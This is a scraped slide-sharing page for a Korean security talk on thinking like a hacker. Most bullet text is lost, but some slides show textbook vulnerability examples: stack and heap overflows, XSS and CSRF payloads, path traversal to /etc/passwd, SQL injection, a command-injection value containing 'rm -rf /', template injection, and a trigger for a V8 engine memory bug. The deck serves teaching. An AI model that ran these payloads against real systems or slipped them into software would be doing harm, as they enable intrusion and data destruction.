Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.

[131]해커의 관점에서 바라보기

해커의 관점에서 바라보기

  • Identifiez-vous pour voir les commentaires

[131]해커의 관점에서 바라보기

  1. 1. • • • •
  2. 2. • • • • • • • •
  3. 3. • •
  4. 4. • • •
  5. 5. • • • • • •
  6. 6. • • • • •
  7. 7. • • • • •
  8. 8. • • • • •
  9. 9. • • • • •
  10. 10. • • • • •
  11. 11. ü ü ü ü ü ü ü ü ü ü
  12. 12. • • • • •
  13. 13. • • • • •
  14. 14. • • • • • • • •
  15. 15. • • • • • Stack Heap ELF, libc, etc. Low Address High Address grows down grows up
  16. 16. int vuln() { char buf[512]; gets(buf); return 0; } 0x0804841d <+0>: push ebp 0x0804841e <+1>: mov ebp,esp 0x08048420 <+3>: sub esp,0x204 0x08048426 <+9>: lea eax,[ebp-0x200] 0x0804842c <+15>: mov DWORD PTR [esp],eax 0x0804842f <+18>: call 0x80482f0 <gets@plt> 0x08048434 <+23>: mov eax,0x0 0x08048439 <+28>: leave 0x0804843a <+29>: ret . . . return address old ebp at main buf . . . A A A A A A A A A A A A . . . A A A A A A A A A A A A 512 bytes
  17. 17. void vuln(unsigned width, unsigned height, char *src) { char *img = malloc(width * height); for (i = 0; i < height; ++i) memcpy(&img[i*width], &src[i*width], width); } img C++ object ... ...A A A A A A A A A A A . . . A A A ↑ virtual function table
  18. 18. Heap Segment Heap Chunk (Freed) Heap Chunk Heap Chunk Pointer Heap Segment Heap Chunk (Freed) Heap Chunk (Freed) Heap Chunk Pointer Heap Segment Heap Chunk (Freed) Heap Chunk (Freed) Heap Chunk Pointer Heap Segment Heap Chunk (Newly alloc’d) Heap Chunk Pointer AAAAAAAAAAAAA AAAAAAAAAAAAA AAAAAAAAAAAAA AAAAAAAAAAAAA AAAAAAAAAAAAA AAAAAAAAAAAAA AAAAAAAA..... •
  19. 19. void vuln() { char buf[24]; strncpy(buf, src, sizeof(buf)); printf(“You typed %sn”, buf); } • •
  20. 20. • • • • • •
  21. 21. • • • •
  22. 22. <div id="pageTitleTxt"> <h2><span class="highlight">Search Results</span><br /> Search: "gravity"</h2> </div> <div id="pageTitleTxt"> <h2><span class="highlight">Search Results</span><br /> Search: ""<script>alert(document.cookie)</script>""</h2> </div>
  23. 23. • <a href="http://server.com/ transfer?acct=EvilAttack er&amount=300BTC">Click here!</a>
  24. 24. • HTTP/1.1 200 OK Date: Thu, 11 Oct 2018 13:33:37 GMT Server: Apache/2.4.35 (Debian) X-Powered-By: PHP/7.2.10 Access-Control-Allow-Origin: * Content-Length: 4 Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: application/json
  25. 25. • • • •
  26. 26. • • • • • • • •
  27. 27. • • http://www.server.com/view?file=../../../../etc/passwd
  28. 28. • • $page = $_GET['page']; include('pages/' . $page); http://server.com/?file=../../uploads/evil.php
  29. 29. • • SELECT id FROM users WHERE username='user' AND password='pass' OR 1=1' uname = request.POST['username'] passwd = request.POST['password'] sql = "SELECT id FROM users WHERE username='" + uname + "' AND password='" + passwd + "'" database.execute(sql) Username: user Password: pass' OR 1=1
  30. 30. • • os.system("sendmail %s < message.txt" % email_addr) email = "a && rm -rf / ;" render("Hello, %s! Welcome to {{ site.name }}" % name) name = "{{ self }}"
  31. 31. • • 컨테이너 대상 공격 표면 및 발생 가능 취약점 • • • • • •
  32. 32. • • • • (a+)+
  33. 33. • • • •
  34. 34. • • •
  35. 35. • • •
  36. 36. • •
  37. 37. • • • • • •
  38. 38. • • • • • • • •
  39. 39. • • • • •
  40. 40. • • • • • •
  41. 41. • • • •
  42. 42. • • • • •
  43. 43. • • • • • • •
  44. 44. • • • • •
  45. 45. • • • • • •
  46. 46. • • • • •
  47. 47. • • • •
  48. 48.
  49. 49. • • • • •
  50. 50. • • • • $ binwalk firmware.bin DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 TRX firmware header, little endian, header size: ... 28 0x1C LZMA compressed data, properties: 0x5D, ... 2319004 0x23629C Squashfs filesystem, little endian, version 4.0, ...
  51. 51. • • • •
  52. 52. • • • •
  53. 53. • • • •
  54. 54. 위험성 평가 보안성 지속 관리 코드 리뷰 및 모의해킹 정적/동적 분석 위협 모델링
  55. 55.
  56. 56. • • •
  57. 57. • ü ü ü ü ü ü ü ü ü ü
  58. 58. • •
  59. 59. • • • • • • •
  60. 60. • <input type="hidden" value=""><img src=x onerror="alert(1)"> • <input value="" type="text" onfocus="alert(1)" autofocus="1" type="hidden"> • <input type="hidden" value="" accesskey="x" onclick="alert(1)">
  61. 61. • • function gc() { for (let i = 0; i < 20; i++) new ArrayBuffer(0x1000000); } function trigger() { function* generator() { } for (let i = 0; i < 1022; i++) { generator.prototype['b' + i]; generator.prototype['b' + i] = 0x1234; } gc(); for (let i = 0; i < 1022; i++) { generator.prototype['b' + i] = 0x1234; } } trigger();
  62. 62. • • MigrateFastToFast
  63. 63. • MigrateFastToFast PropertyArray void MigrateFastToFast(Handle<JSObject> object, Handle<Map> new_map) { ... int old_number_of_fields; int number_of_fields = new_map->NumberOfFields(); int inobject = new_map->GetInObjectProperties(); int unused = new_map->unused_property_fields(); ... int total_size = number_of_fields + unused; int external = total_size - inobject; Handle<PropertyArray> array = isolate->factory()->NewPropertyArray(external); ... } •new_map argument could come from Map::CopyWithField
  64. 64. • Map::CopyAddDescriptor • unused_property_fields • JSObject::kFieldsAdded == 3 • kMaxNumberOfDescriptors • total_size • external MigrateFastToFast MaybeHandle<Map> Map::CopyWithField(Handle<Map> map, Handle<Name> name, Handle<FieldType> type, PropertyAttributes attributes, PropertyConstness constness, Representation representation, TransitionFlag flag) { ... if (map->NumberOfOwnDescriptors() >= kMaxNumberOfDescriptors) { return MaybeHandle<Map>(); } ... Descriptor d = Descriptor::DataField(name, index, attributes, constness, representation, wrapped_type); Handle<Map> new_map = Map::CopyAddDescriptor(map, &d, flag); int unused_property_fields = new_map->unused_property_fields() - 1; if (unused_property_fields < 0) { unused_property_fields += JSObject::kFieldsAdded; } new_map->set_unused_property_fields(unused_property_fields); return new_map; }
  65. 65. Handle<PropertyArray> Factory::NewPropertyArray(int size, PretenureFlag pretenure) { DCHECK_LE(0, size); if (size == 0) return empty_property_array(); CALL_HEAP_FUNCTION(isolate(), isolate()->heap()->AllocatePropertyArray(size, pretenure), PropertyArray); } AllocationResult Heap::AllocatePropertyArray(int length, PretenureFlag pretenure) { ... result->set_map_after_allocation(property_array_map(), SKIP_WRITE_BARRIER); PropertyArray* array = PropertyArray::cast(result); array->initialize_length(length); MemsetPointer(array->data_start(), undefined_value(), length); return result; }
  66. 66. int PropertyArray::length() const { Object* value_obj = READ_FIELD(this, kLengthAndHashOffset); int value = Smi::ToInt(value_obj); return LengthField::decode(value); } class PropertyArray : public HeapObject { public: inline int length() const; inline int synchronized_length() const; inline void initialize_length(int length); ... static const int kLengthFieldSize = 10; class LengthField : public BitField<int, 0, kLengthFieldSize> {}; class HashField : public BitField<int, kLengthFieldSize, kSmiValueSize - kLengthFieldSize - 1> {}; ... };
  67. 67. • length() • • • • • •
  68. 68. b0 b1 b2 b3 b1019 b1020 b1021 PropertyArray new_map->NumberOfFields() == 1022 MigrateFastToFast: new_map->unused_property_fields() == 2 external == 1022 + 2 == 1024 Handle<PropertyArray> array = isolate->factory()->NewPropertyArray(external); b0 b1 b2 b3 b1019 b1020 b1021 array (PropertyArray) array->initialize_length(length); ). 0 1.2 1 . . ( 0 1.2 1 . .
  69. 69. b0 b1 b2 b3 b1019 b1020 b1021 array (PropertyArray) Scavenger::ScavengeObject array->synchronized_length() == 0 Scavenger::EvacuateObject HeapObject::SizeFromMap PropertyArray::synchronized_length LengthField::decode Scavenger::SemiSpaceCopyObject Scavenger::PromoteObject Scavenge/GC: returns 0 Allocate the new memory using the result of SizeFromMap
  70. 70. b0 b1 b2 b3 b1019 b1020 b1021 array (PropertyArray) After Scavenge/GC: ? ? ? ? ? ? ? array (PropertyArray) Now in Old Space with size of 0, but we can still access up to 1022 properties! !
  71. 71. • for (let i = 0; i < 1022; i++) { generator.prototype['b' + i] = 0x1234; } for (let i = 0; i < 1022; i++) { try { document.write(i + " ==> " + generator.prototype['b' + i] + "<br>"); } catch (e) { } }

×